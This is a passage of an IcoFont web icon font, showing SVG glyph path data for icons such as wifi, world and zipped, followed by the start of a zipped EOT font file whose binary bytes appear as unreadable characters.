189c-21-2-42-4-63-7-20-3-41-8-62-12-5-1-7-1-9 5-6 19-10 38-14 57h148v-43z m25 175l-18-76h-33l-28 133h32l15-83 18 83h27l19-83 15 83h32l-28-132h-33l-18 75z m25-364v139c39-5 76-10 114-15-18-54-70-118-114-124z m118 24c16 27 31 54 48 82 15-6 31-12 49-19-30-27-62-47-97-63z m134 101c-23 10-47 20-71 30 8 25 14 51 18 77h114c-14-39-34-74-61-107z m-53 353c-4 26-10 52-18 77 24 10 47 20 71 30 27-33 47-68 61-107h-114z" />
<glyph glyph-name="wheelchair" horiz-adv-x="1000" unicode="&#xf029;" d="M555 67c-39-30-86-45-135-45-125 0-227 101-227 226 0 69 31 133 85 176l15 12-70 85-14-12c-80-64-125-159-125-261 0-185 151-336 336-336 86 0 168 33 231 92l20 19-107 51-9-7z m348 35c-7 10-18 14-30 14l-59 0-95 258-251-1-4 60 176-1-1 104h-184l-5 91c21 17 33 42 33 69 0 51-41 92-91 92-51 0-92-41-92-92 0-45 37-74 37-74l36-354 273 1 100-252 166 1 2 15c2 8 8 48-11 69z" />
<glyph glyph-name="wifi-alt" horiz-adv-x="1000" unicode="&#xf02a;" d="M783 552h-58c-55 62-135 101-225 101-90 0-170-39-225-101h-58c-85 0-154-69-154-155v-94c0-86 69-155 154-155h58c55-62 135-101 225-101 90 0 170 39 225 101h58c85 0 155 69 155 155v94c0 86-70 155-155 155z m-459-307h-49l-22 128-21-128h-49l-47 208h56l16-122 21 122h49l21-122 16 122h55l-46-208z m94 220c16 0 29-12 29-27s-13-26-29-26c-16 0-29 12-29 26s13 27 29 27z m-25-69h50v-150h-50v150z m511-93c0-67-55-121-121-121h-350c47 0 67 54 67 121v94c0 67 54 121 121 121h162c66 0 121-54 121-121v-94z m-122 93h50v-150h-50v150z m54 42c0-14-13-26-28-26-17 0-29 12-29 26s12 27 29 27c16 0 28-12 28-27z m-251 15h166v-49h-112v-46h101v-48h-101v-63h-54v206z" />
<glyph glyph-name="wifi" horiz-adv-x="1000" unicode="&#xf02b;" d="M935 481c-116 116-271 180-435 180s-319-64-435-180c-1-2-2-5-2-7 0-1 0-3 0-4 1-2 4-4 6-6l57-57c1-2 4-5 6-6 1 0 2 0 4 0 2 0 5 1 7 2 95 96 222 149 357 149 135 0 262-53 358-149 2-1 4-2 7-2 2 0 5 1 6 2l64 64c2 2 3 4 3 7 0 2-1 4-2 5 0 1-1 1-1 2z m-435 12c-119 0-231-47-316-131-3-4-3-10 0-14l64-63c2-2 4-3 7-3 2 0 5 1 6 3 64 63 149 99 239 99s175-36 239-99c2-2 4-3 7-3 2 0 5 1 6 3l64 63c2 2 3 4 3 7 0 2-1 5-3 7-85 84-197 131-316 131z m0-169c-74 0-144-29-197-81-2-2-3-4-3-7 0-3 1-5 3-7l64-63c1-2 4-3 6-3 3 0 5 1 7 3 32 32 75 50 120 50s88-18 120-50c2-2 4-3 7-3 2 0 5 1 7 3l63 63c4 4 4 10 0 14-53 52-123 81-197 81z m0-178c-26 0-50-10-69-28-3-4-3-10 0-14l62-62c2-1 4-2 7-2 3 0 5 1 7 2l62 62c3 4 3 10 0 14-19 18-43 28-69 28z" />
<glyph glyph-name="world" horiz-adv-x="1000" unicode="&#xf02c;" d="M500-88c241 0 438 197 438 438 0 183-113 340-273 405-13 6-26 10-40 14-40 12-81 19-125 19-241 0-437-197-437-438s196-438 437-438z m199 781l3 0 1 0c74-43 132-110 166-190-4 3-8 5-13 5-2 0-4 0-5 1-6 0-9 3-11 8-1 3-1 5-2 7 0 1-1 2-1 3-1-1-1-1-2-1 0-1-1-2-2-3-1-1-2-2-3-4-3-3-5-3-8 1 0 1-1 2-1 3l-2 4c0 2-1 4-2 6-2 4-3 4-6 1l-1-2c-1-1-2-2-3-2-3-3-6-3-10-1l-1 2c-2 1-3 3-3 5 0 3 0 6 0 8 0 2-1 4-1 5-1 1-2 2-3 1s-2-2-4-3c-1 1-2 1-4 2-6 3-12 5-18 8-2 1-3 2-5 4-3-11-4-21-5-32-1 0-3 0-4-1-5-1-10-2-15-3-8-3-15-1-21 4-5 4-9 8-12 13-3 7-7 14-11 20 0 1-1 2-1 3 2 2 4 2 6 4 9 5 18 8 28 7 2 0 3 0 4 1 0 0 1 1 2 1 4 2 8 4 11 7 4 4 6 8 9 11 1 2 3 3 4 5-2 3-3 7-4 10-2 2-2 4-1 7 0 3 1 6 1 10 0 1 1 2-1 3-4 1-10 2-15 2-2 0-4 1-5 3-1 3-3 6-4 9-2 2-3 2-5 3-3 0-6 0-9 1-2 0-4 1-5 2-3 3-4 6-5 9-1 5-2 9-2 14 0 6 0 12 1 19z m-19-45c-1 3-1 4 1 5 2 2 5 3 7 1 2-1 3-2 4-3 2-3 5-6 8-7 5-2 8-6 11-9 5-7 9-14 11-23 0 0 0-1 0-2-3-3-7-5-10-7-2-1-3-2-4-2-9-2-14 2-16 9-1 5-2 11-3 16-1 0-2 0-2 0-4-2-7-3-10-5-3 4-4 7-6 11 3 3 7 5 10 8 1 3-1 5-1 8z m-4-166c3 1 5 2 7 4 4 5 9 11 13 16 1 2 3 3 5 4 7 2 14 4 21 6 6 2 12 3 18 3 11 1 23-1 33-5 2-1 4-1 5-1 7 1 13 1 20 0 6-1 11-3 16-7 9-7 18-14 27-21 5-4 5-4 11-3 9 0 18 0 26-2 14-40 21-82 21-126 0-135-68-255-171-327 1 1 1 2 1 4 1 2 2 4 3 7 3 7 6 14 9 21l11 23c2 5 2 10 1 15-1 6-2 12-3 17-1 6-2 12 1 18 3 11 9 21 17 29 3 2 5 5 7 8 3 4 6 8 7 12 3 6 3 12 2 18-1 4-2 9-4 13-1 4-3 7-4 11-2 6-2 13 0 19 1 4 2 7 4 11l4 12c2 5 3 11 3 16-1 4-1 8-2 12-1 3-3 4-7 3-1-1-2-1-4-2-4-2-7-1-9 2-2 2-4 4-7 4-2 1-4 2-7 2-8 1-16 0-24 0-6-1-12-1-18-1-1 0-3 1-5 1-5 1-9 2-14 5-8 3-15 8-22 14-11 9-21 19-31 29-2 1-2 3-3 4-1 3-1 5-1 7-1 11 0 21 2 31 2 11 5 22 8 32 2 6 3 12 3 19 0 2 0 5-2 7-1 2-1 4 0 6 1 3 3 7 5 10 6 10 16 17 27 20z m-80 210c-3-3-4-6-5-9 0-1-1-3-1-4-7 1-12 2-18 3-3 1-5 2-7 4-1 0-2 1-3 2-3 3-2 7 2 9 7 3 15 5 22 8 2 1 2 1 3 0 3-1 5-3 7-5 3-2 3-5 0-8z m-93 37c3 6 5 13 8 20 28-1 56-4 82-11-4-6-7-11-11-17-5-1-10-2-16-3-2 0-3-1-4-2l-17-20c-5-6-10-12-15-18 0-1-1-1-2-2-4 1-6 4-9 6-5 4-8 10-10 15-4 8-6 16-6 25-1 2-1 4 0 7z m-316-247c1 6 2 11 2 17-1 1-3 1-4 2-7 3-13 6-19 11-4 3-7 6-9 10-3 5-5 11-4 17 0 3 1 7 1 10 69 119 197 199 344 200l3-8c1 0 1-1 1-2-5-4-9-7-14-11-4-4-8-8-13-11-2 4-5 7-9 9-6 5-4 4-11 4-5-1-10-1-15-3-2-1-5-1-8-1-2 0-4 1-5 3-1 0-1 1-1 1-1 2-3 2-5 1-1 0-3-1-4-1-2-2-4-3-6-5-2-2-5-4-7-6l-13-8c-1-1-2-2-2-4-1-3-2-5-2-8 0-4 0-8 1-12 2-5 6-7 11-5 6 2 11 5 16 9 3 3 6 6 7 10 1 0 1 1 1 2 1 1 2 1 4 1 1-1 2-1 4-2 3-1 6-1 9 0 1 1 3 2 4 3 2 1 3 3 4 4 2 2 4 3 7 5 4 1 8 1 11-4 2-3 4-6 8-8 1-1 2-2 3-3 2-2 3-4 2-6 0-3-2-6-3-8-2-2-3-4-4-6-1-2-1-3-1-4 0-1 1-2 2-2 2 0 3 1 5 1 1 0 2 1 3 1 0-9-2-18-6-26-1-2-2-3-3-4-4-3-8-5-12-4-4 1-7 2-9 5-5 4-10 4-15-1-1-2-2-3-3-5-1-2-3-3-5-4-9-2-18-3-27-2-1 0-3 0-4 0-6-2-12-4-18-5-2-1-4-2-6-3-4-3-8-5-13-6-4-1-9-2-13 1-14-12-29-20-46-26-1-6-2-12-3-19l-4-22c0-2-1-3-3-3-2-1-4 0-5 1-2 2-3 4-4 5-2 5-4 10-4 16-1 7-5 12-11 15-9 4-18 6-27 4-15-2-28-9-38-21-9-9-9-9-12-22 0-5-1-10 1-14 1-5 5-8 9-9 3-1 6-1 8 0l9 1c0 1 1 1 2 0 2 0 4-2 6-4 1-2 2-4 1-7-1-2-3-4-4-6-3-2-5-3-7-5-1-1-2-1-3-2-4-4-4-8 0-11 1-1 2-1 3-2 1-1 2-1 3-2-1-2-1-5-1-8-1-6-1-13 0-20 0-6 3-11 8-15 3-3 7-5 11-7 2-1 4-2 6-2 7-2 13-1 18 4 2 3 4 5 6 8 3 4 7 6 13 5 2 0 5-2 7-4 3-2 6-4 9-5 4-2 8-4 12-6 2-1 4-2 5-2 12-3 22-9 30-19 2-2 3-3 6-4 11-4 21-9 30-17 12-10 21-21 25-36 1-3 3-6 5-9 3-2 5-5 7-8 2-4 4-8 7-12 0-1 1-2 1-3 3-1 4-1 6-1 13-3 25-8 36-15 6-4 11-8 15-14 2-1 2-3 2-5 1-17-6-31-20-41-2-1-3-3-4-5-4-10-7-20-11-30-1-2-2-4-3-5l-15-22c-2-2-4-4-6-5-2-1-4-2-6-3-7-3-14-6-22-7-2-1-4-2-5-3-5-7-10-13-15-20-1-1-1-2-2-2-5-9-11-18-16-26-2-2-3-4-5-5-8-6-16-11-25-17-2-1-4-3-6-5-4-4-8-8-12-12-1-1-2-2-3-3l-11-25c-1-2-1-4-1-5 3-14 5-28 8-42 0-1 0-3 0-4-1 0-2 0-3 0-7 4-14 8-20 12-10 10-18 21-25 32-1 1-1 3-1 4-2 11-3 22-5 33 0 1 0 2-1 3-2 3-3 6-3 9-2 8-1 15 0 22l4 27c0 1 0 2-1 3-2 3-2 6-3 10 0 7 1 13 3 20 1 2 1 4 1 7l4 23c0 3 1 7 1 10-1 0-1 1-2 1-4 4-7 9-8 14-1 4-1 8 0 12 1 3 1 6 2 9l-4 2c-7 5-13 10-18 17-5 6-11 12-16 19-2 3-3 6-5 8-2 5-4 10-2 16 0 1 0 2-1 3-3 9-3 18-3 27 1 7 3 12 6 18 2 3 4 6 7 10 4 5 8 11 12 17 4 5 6 11 7 18 1 3 1 6 1 9 0 5-2 9-6 12-5 3-9 6-13 9-3 2-4 4-4 7-2 6-3 12-5 18 0 2-1 4-3 5-3 3-5 5-8 7l-3 3z m117 13c0 1 1 1 2 1l9 5 7 3c1 0 2 0 2 1 3-2 5-3 8-5 2-2 5-2 8-3-1-4-1-7-3-10-2 0-3 0-4 1-5 2-10 3-16 3l-6 0c-2 0-4 0-7 0-1 0-2 0-2 2-1 1 1 2 2 2z m-11 21c-9 1-18 3-27 5-3 0-5 0-7 3 2 6 6 9 12 10 5 1 9 0 12-3 5-5 12-7 18-7 4 0 8-1 11-2 1 0 3-1 4-2 0 0 0-1 0-2 0-1-1-2-1-2-3 0-5-1-8-1-1 0-2 0-4 0-3 0-7 1-10 1z" />
<glyph glyph-name="zigzag" horiz-adv-x="1000" unicode="&#xf02d;" d="M844 360c-104 32-215 48-323 65-59 9-119 13-179 18-31 2-56 12-55 23 0 10 26 19 57 20 167 7 334 4 499 21 64 6 45 24 34 54-40 116-110 117-204 130-64 8-129 10-193 17-14 1-28 3-42 6-23 4-42 13-42 18 0 6 26 15 57 19l11 2c31 4 31 7 0 12-63 10-159-20-225-68-25-18-42-42-41-49 1-8 27-13 58-13h342c32 0 57-6 57-12 0-6-25-14-56-18-19-2-37-4-56-7-116-20-235-33-348-64-106-28-138-67-132-157 2-31 33-59 64-60 165-7 332 17 494-29 31-8 29-20-2-22-46-3-91-5-135-13-94-16-186-39-278-61-42-11-68-25-66-87 1-52 42-81 95-85 78-5 156-8 233-16 48-5 109-2 140-30 50-45 63-58 85-16 14 28 26 53 0 69-91 55-197 51-296 73-30 7-37 26-13 35 14 5 29 9 44 9 126 3 253 1 380 3 27 0 65 4 81 21 91 99 41 166-45 192z" />
<glyph glyph-name="zipped" horiz-adv-x="1000" unicode="&#xf02e;" d="M742 785h-187v-43h-44v-43h44v-44h-44v-43h44v-43h-44v-44h44v-43h-44v-44h44v-43h-44v-44h44v-42h-44v-87c48-13 88-57 88-109 0-60-49-108-109-108-62 0-109 48-109 108 0 57 39 100 87 109v43h-44v44h44v42h-44v44h44v43h-44v44h44v43h-44v43h44v44h-44v43h44v43h-44v44h44v43h-210c-108 0-195-86-195-194v-482c0-107 87-194 195-194h484c108 0 196 87 196 194v482c-1 108-88 194-196 194z m-288-618c-4-2-7-5-10-8-3-3-5-5-8-8 0-1 0-1 0-2-3-4-5-7-7-11-1-3-3-8-3-11-2-5-2-9-2-13 0-5 0-9 2-13 0-1 0-2 0-3 1-3 2-6 3-9 2-4 4-7 7-11 0 0 0-1 0-1 2-3 5-6 7-8 7-7 14-12 23-15 3-2 6-3 9-3 1 0 2-1 2 0 4-2 9-2 13-2s8 0 12 2c0-1 1 0 2 0 3 0 6 2 9 3 9 3 17 9 23 15 3 3 4 5 7 8 2 4 5 8 6 12 4 8 6 16 6 25 0 4-1 8-2 13 0 4-2 8-4 11-1 4-3 7-5 10 0 1-1 2-1 3-3 3-5 6-8 8-3 3-6 6-10 8-2 2-5 4-8 5-2 1-6 2-9 3-2 1-6 2-9 3-3 0-6 0-10 0-3 0-6 0-9 0-3-1-7-1-9-3-3 0-7-2-9-3-3-2-6-3-8-5z" />
</font>
</defs>
</svg>PK!z#��icofont/fonts/icofont.eotnu&1i�lãÈâLP˜šžIcoFontRegularVersion 1.0icofont€0GSUB ‹%z8TOS/2>`QÅŒVcmap·Äö"œsôglyfÿ¡„o·L head)pìà6hhea<X¼$hmtxômü†ä ¸locaAAý¼– ¼maxp	¤	û name4¢4šyl
post<Pì{xgORÿjèÿÖÿ×.žš˜_<õèב–µ×‘–µÿÖÿ*r.	ïl

ÿ
0>DFLTlatnligaèz¼Œz¼à1PfEd@èð.RÿjZrÖèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿìèèèèèèèèÿþèèèÿÿèèèèÿýèèèèèÿ÷èèÿûèèÿúèèèÿÿèèèèèèèèèÿùèÿùèèèèèÿÿèÿþèèèèèèÿÿèèÿÿèèÿþèèèèèèèèèèèèèèèèèÿûèèèèèÿóèèèÿüèèèèèèÿðèèèèèèèÿþèèÿÿèèèèèèÿÿèèèèèèèèèèèèÿÿèèÿøèèÿÖèÿþèèèèèèèèèèèÿúèèèèÿþèÿûèèèÿþèÿóèèèÿÿèèèèÿÿèèÿ÷èèèèÿÿèèÿûèèèèÿòèèÿþèÿüèÿùèÿÿèÿüèèèèèÿþèèèèèèèèÿÿèèÿ÷èèÿÿèèèèÿòèèèèèèèÿöèÿüèèèèÿþèèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿþèèèèèèèèèèÿüèÿûèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿúèèÿ÷èèÿüèèèèèèèèèèèèèèèèèèèèèèèÿüèèèèèèèèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿýèèèèèèèèèèèÿÿèèèèèèÿÿèèèèÿýèèèèÿüèèèèèèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿ÷èèèèèÿÿèèèèÿöèèÿÿèèèÿýèèèèÿþèèÿÿèÿüèèèÿýèèèèÿüèÿùèÿîèèèèèèÿÿèèèÿÿèÿôèèèÿþèèèèÿýèÿúèÿÿèèèÿúèèèèèèèèèèèèèèèèèèèèèÿýèÿÿèÿýèèèèèèÿþèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿûèèèèÿÿèèèèèèèèèèèÿÿèÿþèèÿüèèèèèèÿþèèèèèÿþèèèÿëèèèèèÿüèèèèèèèèèèÿîèèÿÿèèèèèèèÿôèÿÿèèèèèèèèèèÿÿèèèèÿéèèèÿùèèÿüèÿÿèèèÿÿèÿþèÿÿèÿþèèÿþèèèèèèèÿÿèèèèèèèèèèÿÿèÿýèÿüèÿþèÿýèèèÿõèèèèèÿõèÿúèèèÿÿèèèèèèèèèèèèÿÿèèèèèèèèèÿÿèèèèÿÿèèèèèÿÿèèÿýèèèèèèÿÿèÿÿèèÿÿèèÿþèèèèèèèèèèèèèèèèÿýèèÿÿèèèèèèèÿüèÿõèèèèèèèèèèèèÿøèèÿõèèÿÿèèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿûèèèèèèèÿÿèèèÿþèÿýèÿþèèÿüèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿúèèÿüèèèÿÛèèÿ÷èèèÿüèèÿÿèèèèèÿÿèÿÿèèèèÿýèèèèÿýèÿÿèèÿÿèÿýèÿýèèèèèèÿøèèèÿúèÿûèÿüèèèÿÿèèÿÿèèÿÿèÿÿèÿÿèèèèèèèèÿÿèèèèèèèèèèèèÿþèÿôèÿúèèÿÿèÿüèèèèèèèÿýèèèÿôèèèèÿûèèèèÿþèèèèèèèèèÿþèèèèèèèÿùèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿýèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿýèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿñèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿýèèèèèèèèèèèèèèèèèèèèèèèèèèèèÿöèÿÿèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèè,°ª,
°~ð.ÿÿèÿÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÁÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~€‚ƒ„…†‡ˆ‰Š‹ŒŽ‘’“”•–—˜™š›œžŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖרÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ	

 !"#$%&'()*+,-bD/èèèèèèèèèèèèèèèèèè	è	è	
è
è
èèèè
è
è
èèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèèè è è !è!è!"è"è"#è#è#$è$è$%è%è%&è&è&'è'è'(è(è()è)è)*è*è*+è+è+,è,è,-è-è-.è.è./è/è/0è0è01è1è12è2è23è3è34è4è45è5è56è6è67è7è78è8è89è9è9:è:è:;è;è;<è<è<=è=è=>è>è>?è?è?@è@è@AèAèABèBèBCèCèCDèDèDEèEèEFèFèFGèGèGHèHèHIèIèIJèJèJKèKèKLèLèLMèMèMNèNèNOèOèOPèPèPQèQèQRèRèRSèSèSTèTèTUèUèUVèVèVWèWèWXèXèXYèYèYZèZèZ[è[è[\è\è\]è]è]^è^è^_è_è_`è`è`aèaèabèbèbcècècdèdèdeèeèefèfèfgègèghèhèhièièijèjèjkèkèklèlèlmèmèmnènènoèoèopèpèpqèqèqrèrèrsèsèstètètuèuèuvèvèvwèwèwxèxèxyèyèyzèzèz{è{è{|è|è|}è}è}~è~è~èè€è€è€èè‚è‚肃èƒèƒ„è„è„…è…è…†è†è†‡è‡è‡ˆèˆèˆ‰è‰è‰ŠèŠèŠ‹è‹è‹ŒèŒèŒèèŽèŽèŽèèèè‘è‘è‘’è’è’“è“è“”è”蔕è•è•–è–è–—è—è—˜è˜è˜™è™è™šèšèš›è›è›œèœèœèèžèžèžŸèŸèŸ è è ¡è¡è¡¢è¢è¢£è£è£¤è¤è¤¥è¥è¥¦è¦è¦§è§è§¨è¨è¨©è©è©ªèªèª«è«è«¬è¬è¬­è­è­®è®è®¯è¯è¯°è°è°±è±è±²è²è²³è³è³´è´è´µèµèµ¶è¶è¶·è·è·¸è¸è¸¹è¹è¹ºèºèº»è»è»¼è¼è¼½è½è½¾è¾è¾¿è¿è¿ÀèÀèÀÁèÁèÁÂèÂèÂÃèÃèÃÄèÄèÄÅèÅèÅÆèÆèÆÇèÇèÇÈèÈèÈÉèÉèÉÊèÊèÊËèËèËÌèÌèÌÍèÍèÍÎèÎèÎÏèÏèÏÐèÐèÐÑèÑèÑÒèÒèÒÓèÓèÓÔèÔèÔÕèÕèÕÖèÖèÖ×è×èרèØèØÙèÙèÙÚèÚèÚÛèÛèÛÜèÜèÜÝèÝèÝÞèÞèÞßèßèßàèàèàáèáèáâèâèâãèãèãäèäèäåèåèåæèæèæçèçèçèèèèèéèéèéêèêèêëèëèëìèìèìíèíèíîèîèîïèïèïðèðèðñèñèñòèòèòóèóèóôèôèôõèõèõöèöèö÷è÷è÷øèøèøùèùèùúèúèúûèûèûüèüèüýèýèýþèþèþÿèÿèÿéééééééééééééééééé	é	é	
é
é
éééé
é
é
éééééééééééééééééééééééééééééééééééé é é !é!é!"é"é"#é#é#$é$é$%é%é%&é&é&'é'é'(é(é()é)é)*é*é*+é+é+,é,é,-é-é-.é.é./é/é/0é0é01é1é12é2é23é3é34é4é45é5é56é6é67é7é78é8é89é9é9:é:é:;é;é;<é<é<=é=é=>é>é>?é?é?@é@é@AéAéABéBéBCéCéCDéDéDEéEéEFéFéFGéGéGHéHéHIéIéIJéJéJKéKéKLéLéLMéMéMNéNéNOéOéOPéPéPQéQéQRéRéRSéSéSTéTéTUéUéUVéVéVWéWéWXéXéXYéYéYZéZéZ[é[é[\é\é\]é]é]^é^é^_é_é_`é`é`aéaéabébébcécécdédédeéeéeféféfgégéghéhéhiéiéijéjéjkékéklélélmémémnénénoéoéopépépqéqéqrérérséséstététuéuéuvévévwéwéwxéxéxyéyéyzézéz{é{é{|é|é|}é}é}~é~é~éé€é€é€éé‚é‚邃éƒéƒ„é„é„…é…é…†é†é†‡é‡é‡ˆéˆéˆ‰é‰é‰ŠéŠéŠ‹é‹é‹ŒéŒéŒééŽéŽéŽéééé‘é‘é‘’é’é’“é“é“”é”锕é•é•–é–é–—é—é—˜é˜é˜™é™é™šéšéš›é›é›œéœéœééžéžéžŸéŸéŸ é é ¡é¡é¡¢é¢é¢£é£é£¤é¤é¤¥é¥é¥¦é¦é¦§é§é§¨é¨é¨©é©é©ªéªéª«é«é«¬é¬é¬­é­é­®é®é®¯é¯é¯°é°é°±é±é±²é²é²³é³é³´é´é´µéµéµ¶é¶é¶·é·é·¸é¸é¸¹é¹é¹ºéºéº»é»é»¼é¼é¼½é½é½¾é¾é¾¿é¿é¿ÀéÀéÀÁéÁéÁÂéÂéÂÃéÃéÃÄéÄéÄÅéÅéÅÆéÆéÆÇéÇéÇÈéÈéÈÉéÉéÉÊéÊéÊËéËéËÌéÌéÌÍéÍéÍÎéÎéÎÏéÏéÏÐéÐéÐÑéÑéÑÒéÒéÒÓéÓéÓÔéÔéÔÕéÕéÕÖéÖéÖ×é×éרéØéØÙéÙéÙÚéÚéÚÛéÛéÛÜéÜéÜÝéÝéÝÞéÞéÞßéßéßàéàéàáéáéáâéâéâãéãéãäéäéäåéåéåæéæéæçéçéçèéèéèéééééêéêéêëéëéëìéìéìíéíéíîéîéîïéïéïðéðéðñéñéñòéòéòóéóéóôéôéôõéõéõöéöéö÷é÷é÷øéøéøùéùéùúéúéúûéûéûüéüéüýéýéýþéþéþÿéÿéÿêêêêêêêêêêêêêêêêêê	ê	ê	
ê
ê
êêêê
ê
ê
